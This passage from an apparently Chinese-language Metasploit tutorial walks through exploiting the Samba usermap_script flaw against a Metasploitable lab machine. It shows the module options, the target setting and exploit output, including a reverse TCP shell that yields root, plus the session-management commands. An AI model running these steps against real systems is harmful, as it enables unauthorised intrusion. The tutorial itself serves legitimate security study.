properties\"><\/code><\/pre>\n<p>\u901a\u8fc7\u6a21\u5757\u63cf\u8ff0\u4fe1\u606f\uff0c\u53ef\u7528\u770b\u51fa\uff0c\u8be5\u6a21\u5757\u5229\u7528<code>Samba 3.0.20<\/code>\u5230<code>3.0.25rc<\/code>\u4e2d\u7684\u547d\u4ee4\u6267\u884c\u6f0f\u6d1e\u3002\u6211\u4eec\u6765\u8bd5\u8bd5\u3002<\/p>\n<p>3\u3001\u914d\u7f6e\u53c2\u6570<\/p>\n<p>\u901a\u8fc7<code>show missing<\/code>\u547d\u4ee4\uff0c\u67e5\u770b\u5fc5\u987b\u8981\u914d\u7f6e\u7684\u53c2\u6570<\/p>\n<pre><code class=\"hljs linux copyable properties\"><\/code><\/pre>\n<ol class=\"hljs-ln\">\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"1\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-attr\">msf5<\/span> <span class=\"hljs-string\">exploit(multi\/samba\/usermap_script) &gt; show missing<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"2\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"3\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-attr\">Module<\/span> <span class=\"hljs-string\">options (exploit\/multi\/samba\/usermap_script):<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"4\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"5\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-attr\">Name<\/span> <span class=\"hljs-string\">Current Setting Required Description<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"6\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-meta\">----<\/span> <span class=\"hljs-string\">--------------- -------- -----------<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"7\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-attr\">RHOSTS<\/span> <span class=\"hljs-string\">yes The target address range or CIDR identifier<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"8\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"9\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-attr\">msf5<\/span> <span class=\"hljs-string\">exploit(multi\/samba\/usermap_script) &gt;<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"10\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"copy-code-btn\"><span class=\"hljs-attr\">\u590d\u5236\u4ee3\u7801<\/span><\/span><\/div>\n<\/div>\n<\/li>\n<\/ol>\n<pre><code class=\"hljs linux copyable properties\"><\/code><\/pre>\n<p>TIP\uff1a\u8981\u663e\u793a\u6a21\u5757\u7684\u9ad8\u7ea7\u9009\u9879\uff0c\u4f60\u53ef\u4ee5\u4f7f\u7528<code>show advanced<\/code>\u00a0\u547d\u4ee4<\/p>\n<p>\u8fd9\u91cc\u53ea\u9700\u8981\u6211\u4eec\u8bbe\u7f6e\u76ee\u6807\u7684<code>IP<\/code>\u5730\u5740\u5373\u53ef\uff0c\u6211\u4eec\u901a\u8fc7<code>set [options] [value]<\/code>\u6765\u8bbe\u7f6e<\/p>\n<pre><code class=\"hljs linux copyable yaml\"><\/code><\/pre>\n<ol class=\"hljs-ln\">\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"1\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">msf5<\/span> <span class=\"hljs-string\">exploit(multi\/samba\/usermap_script)<\/span> <span class=\"hljs-string\">&gt;<\/span> <span class=\"hljs-string\">set<\/span> <span class=\"hljs-string\">RHOSTS<\/span> <span class=\"hljs-number\">192.168<\/span><span class=\"hljs-number\">.177<\/span><span class=\"hljs-number\">.145<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"2\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">RHOSTS<\/span> <span class=\"hljs-string\">=&gt;<\/span> <span class=\"hljs-number\">192.168<\/span><span class=\"hljs-number\">.177<\/span><span class=\"hljs-number\">.145<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"3\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">msf5<\/span> <span class=\"hljs-string\">exploit(multi\/samba\/usermap_script)<\/span> <span class=\"hljs-string\">&gt;<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"4\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"copy-code-btn\"><span class=\"hljs-string\">\u590d\u5236\u4ee3\u7801<\/span><\/span><\/div>\n<\/div>\n<\/li>\n<\/ol>\n<pre><code class=\"hljs linux copyable yaml\"><\/code><\/pre>\n<p>4\u3001\u653b\u51fb<\/p>\n<p>\u6267\u884c<code>exploit<\/code>\u5373\u53ef\u3002<\/p>\n<pre><code class=\"hljs linux copyable csharp\"><\/code><\/pre>\n<ol class=\"hljs-ln\">\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"1\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-function\">msf5 <span class=\"hljs-title\">exploit<\/span>(<span class=\"hljs-params\">multi\/samba\/usermap_script<\/span>) &gt; exploit<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"2\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"3\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-function\">[*] Started reverse TCP <span class=\"hljs-keyword\">double<\/span> handler <span class=\"hljs-keyword\">on<\/span> 192.168.177.143:4444<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"4\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-function\">[*] Accepted the first client connection...<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"5\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-function\">[*] Accepted the second client connection...<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"6\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-function\">[*] Command: echo 48vnI4nfAB1GTD5d<\/span>;<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"7\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[<span class=\"hljs-meta\">*<\/span>] Writing to socket A<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"8\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[<span class=\"hljs-meta\">*<\/span>] Writing to socket B<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"9\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[<span class=\"hljs-meta\">*<\/span>] Reading <span class=\"hljs-keyword\">from<\/span> sockets...<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"10\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[<span class=\"hljs-meta\">*<\/span>] Reading <span class=\"hljs-keyword\">from<\/span> socket B<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"11\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[<span class=\"hljs-meta\">*<\/span>] B: <span class=\"hljs-string\">\"48vnI4nfAB1GTD5d\\r\\n\"<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"12\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[<span class=\"hljs-meta\">*<\/span>] Matching...<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"13\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[<span class=\"hljs-meta\">*<\/span>] A <span class=\"hljs-keyword\">is<\/span> input...<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"14\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[<span class=\"hljs-meta\">*<\/span>] Command shell session <span class=\"hljs-number\">1<\/span> opened (<span class=\"hljs-number\">192.168<\/span><span class=\"hljs-number\">.177<\/span><span class=\"hljs-number\">.143<\/span>:<span class=\"hljs-number\">4444<\/span> -&gt; <span class=\"hljs-number\">192.168<\/span><span class=\"hljs-number\">.177<\/span><span class=\"hljs-number\">.145<\/span>:<span class=\"hljs-number\">51353<\/span>) at <span class=\"hljs-number\">2019<\/span><span class=\"hljs-number\">-04<\/span><span class=\"hljs-number\">-26<\/span> <span class=\"hljs-number\">13<\/span>:<span class=\"hljs-number\">14<\/span>:<span class=\"hljs-number\">08<\/span> +<span class=\"hljs-number\">0800<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"15\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"16\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"copy-code-btn\">\u590d\u5236\u4ee3\u7801<\/span><\/div>\n<\/div>\n<\/li>\n<\/ol>\n<pre><code class=\"hljs linux copyable csharp\"><\/code><\/pre>\n<p>\u653b\u51fb\u6210\u529f\u540e\uff0c\u6211\u4eec\u5c06\u83b7\u5f97\u4e0e\u76ee\u6807\u673a\u5668\u7684\u8fde\u63a5\u4f1a\u8bdd\u3002\u6211\u4eec\u53ef\u7528\u6267\u884c\u4e00\u4e9b\u547d\u4ee4\uff0c\u6765\u9a8c\u8bc1\u662f\u5426\u83b7\u5f97\u4e86\u76ee\u6807\u673a\u5668\u7684\u6743\u9650\u3002<\/p>\n<pre><code class=\"hljs linux copyable groovy\"><\/code><\/pre>\n<ol class=\"hljs-ln\">\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"1\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">hostname<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"2\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">metasploitable<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"3\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">ip a show<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"4\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-number\">1<\/span>: <span class=\"hljs-attr\">lo:<\/span> &lt;LOOPBACK,UP,LOWER_UP&gt; mtu <span class=\"hljs-number\">16436<\/span> qdisc noqueue<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"5\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">link\/loopback <span class=\"hljs-number\">00<\/span>:<span class=\"hljs-number\">00<\/span>:<span class=\"hljs-number\">00<\/span>:<span class=\"hljs-number\">00<\/span>:<span class=\"hljs-number\">00<\/span>:<span class=\"hljs-number\">00<\/span> brd <span class=\"hljs-number\">00<\/span>:<span class=\"hljs-number\">00<\/span>:<span class=\"hljs-number\">00<\/span>:<span class=\"hljs-number\">00<\/span>:<span class=\"hljs-number\">00<\/span>:<span class=\"hljs-number\">00<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"6\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">inet <span class=\"hljs-number\">127.0<\/span><span class=\"hljs-number\">.0<\/span><span class=\"hljs-number\">.1<\/span>\/<span class=\"hljs-number\">8<\/span> scope host lo<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"7\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-attr\">inet6 :<\/span>:<span class=\"hljs-number\">1<\/span>\/<span class=\"hljs-number\">128<\/span> scope host<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"8\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">valid_lft forever preferred_lft forever<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"9\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-number\">2<\/span>: <span class=\"hljs-attr\">eth0:<\/span> &lt;BROADCAST,MULTICAST,UP,LOWER_UP&gt; mtu <span class=\"hljs-number\">1500<\/span> qdisc pfifo_fast qlen <span class=\"hljs-number\">1000<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"10\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">link\/ether <span class=\"hljs-number\">00<\/span>:<span class=\"hljs-number\">0<\/span><span class=\"hljs-attr\">c:<\/span><span class=\"hljs-number\">29<\/span>:<span class=\"hljs-attr\">cc:<\/span><span class=\"hljs-number\">9<\/span><span class=\"hljs-attr\">a:<\/span>ea brd <span class=\"hljs-attr\">ff:<\/span><span class=\"hljs-attr\">ff:<\/span><span class=\"hljs-attr\">ff:<\/span><span class=\"hljs-attr\">ff:<\/span><span class=\"hljs-attr\">ff:<\/span>ff<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"11\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">inet <span class=\"hljs-number\">192.168<\/span><span class=\"hljs-number\">.177<\/span><span class=\"hljs-number\">.145<\/span>\/<span class=\"hljs-number\">24<\/span> brd <span class=\"hljs-number\">192.168<\/span><span class=\"hljs-number\">.177<\/span><span class=\"hljs-number\">.255<\/span> scope global eth0<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"12\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">inet6 <span class=\"hljs-attr\">fe80:<\/span>:<span class=\"hljs-number\">20<\/span><span class=\"hljs-attr\">c:<\/span><span class=\"hljs-number\">29<\/span><span class=\"hljs-attr\">ff:<\/span><span class=\"hljs-attr\">fecc:<\/span><span class=\"hljs-number\">9<\/span>aea\/<span class=\"hljs-number\">64<\/span> scope link<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"13\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">valid_lft forever preferred_lft forever<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"14\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-number\">3<\/span>: <span class=\"hljs-attr\">eth1:<\/span> &lt;BROADCAST,MULTICAST&gt; mtu <span class=\"hljs-number\">1500<\/span> qdisc noop qlen <span class=\"hljs-number\">1000<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"15\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">link\/ether <span class=\"hljs-number\">00<\/span>:<span class=\"hljs-number\">0<\/span><span class=\"hljs-attr\">c:<\/span><span class=\"hljs-number\">29<\/span>:<span class=\"hljs-attr\">cc:<\/span><span class=\"hljs-number\">9<\/span><span class=\"hljs-attr\">a:<\/span>f4 brd <span class=\"hljs-attr\">ff:<\/span><span class=\"hljs-attr\">ff:<\/span><span class=\"hljs-attr\">ff:<\/span><span class=\"hljs-attr\">ff:<\/span><span class=\"hljs-attr\">ff:<\/span>ff<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"16\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">id<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"17\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">uid=<span class=\"hljs-number\">0<\/span>(root) gid=<span class=\"hljs-number\">0<\/span>(root)<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"18\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"copy-code-btn\">\u590d\u5236\u4ee3\u7801<\/span><\/div>\n<\/div>\n<\/li>\n<\/ol>\n<pre><code class=\"hljs linux copyable groovy\"><\/code><\/pre>\n<p>\u6309<code>Ctrl+Z<\/code>\u53ef\u5c06\u4f1a\u8bdd\u8f6c\u5230\u540e\u53f0<\/p>\n<pre><code class=\"hljs linux copyable perl\"><\/code><\/pre>\n<ol class=\"hljs-ln\">\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"1\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">uid=<span class=\"hljs-number\">0<\/span>(root) gid=<span class=\"hljs-number\">0<\/span>(root)<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"2\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">^Z \/\/\u6309 Ctrl+Z<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"3\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">Background session <span class=\"hljs-number\">1<\/span>? [<span class=\"hljs-regexp\">y\/N] y<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"4\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-regexp\">msf5 exploit(multi\/samba\/usermap<\/span>_script) &gt;<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"5\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"copy-code-btn\">\u590d\u5236\u4ee3\u7801<\/span><\/div>\n<\/div>\n<\/li>\n<\/ol>\n<pre><code class=\"hljs linux copyable perl\"><\/code><\/pre>\n<p>5\u3001\u8981\u64cd\u4f5c\u4f1a\u8bdd\uff0c\u53ef\u7528\u4f7f\u7528<code>sessions<\/code>\u547d\u4ee4<\/p>\n<pre><code class=\"hljs linux copyable vbscript\"><\/code><\/pre>\n<ol class=\"hljs-ln\">\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"1\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">msf5 exploit(multi\/samba\/usermap_script) &gt; sessions -h<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"2\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">Usage: sessions [options] <span class=\"hljs-keyword\">or<\/span> sessions [id]<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"3\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"4\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">Active session manipulation <span class=\"hljs-keyword\">and<\/span> interaction.<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"5\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"6\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">OPTIONS:<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"7\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"8\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">-C &lt;opt&gt; Run a Meterpreter Command <span class=\"hljs-keyword\">on<\/span> the session given <span class=\"hljs-keyword\">with<\/span> -i, <span class=\"hljs-keyword\">or<\/span> all<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"9\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">-K Terminate all sessions<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"10\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">-S &lt;opt&gt; Row search <span class=\"hljs-built_in\">filter<\/span>.<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"11\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">-c &lt;opt&gt; Run a command <span class=\"hljs-keyword\">on<\/span> the session given <span class=\"hljs-keyword\">with<\/span> -i, <span class=\"hljs-keyword\">or<\/span> all<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"12\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">-d List all inactive sessions<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"13\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">-h Help banner<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"14\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">-i &lt;opt&gt; Interact <span class=\"hljs-keyword\">with<\/span> the supplied session ID<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"15\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">-k &lt;opt&gt; Terminate sessions by session ID <span class=\"hljs-keyword\">and<\/span>\/<span class=\"hljs-keyword\">or<\/span> range<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"16\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">-l List all active sessions<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"17\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">-n &lt;opt&gt; Name <span class=\"hljs-keyword\">or<\/span> rename a session by ID<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"18\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">-q Quiet mode<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" 